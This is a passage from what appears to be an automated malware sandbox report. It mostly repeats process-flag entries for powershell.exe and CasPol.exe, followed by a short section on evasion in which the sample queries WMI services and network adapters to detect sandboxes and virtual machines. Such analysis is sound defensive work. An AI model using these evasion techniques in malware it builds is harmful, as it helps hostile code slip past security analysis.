            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5720Thread sleep count: 5594 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5720Thread sleep count: 3289 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -23058430092136925s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6480Thread sleep count: 7068 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6480Thread sleep count: 2772 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -99766s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -99655s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -99547s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -99438s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -99313s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -99203s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -99094s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -98969s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -98859s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -98750s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -98640s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -98531s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -98422s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -98313s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -98188s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -98078s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -97969s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -97844s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -97733s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -97625s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -97468s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -97359s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -97250s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -97141s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -97031s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -96922s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -96813s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -96688s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -96578s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -96469s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -96344s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -96234s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -96125s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -96015s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -95906s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -95797s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -95679s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -95563s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -95448s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -95328s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -95219s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -95109s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -95000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -94891s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -94766s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -94633s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -94516s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6608Thread sleep time: -94406s >= -30000sJump to behavior
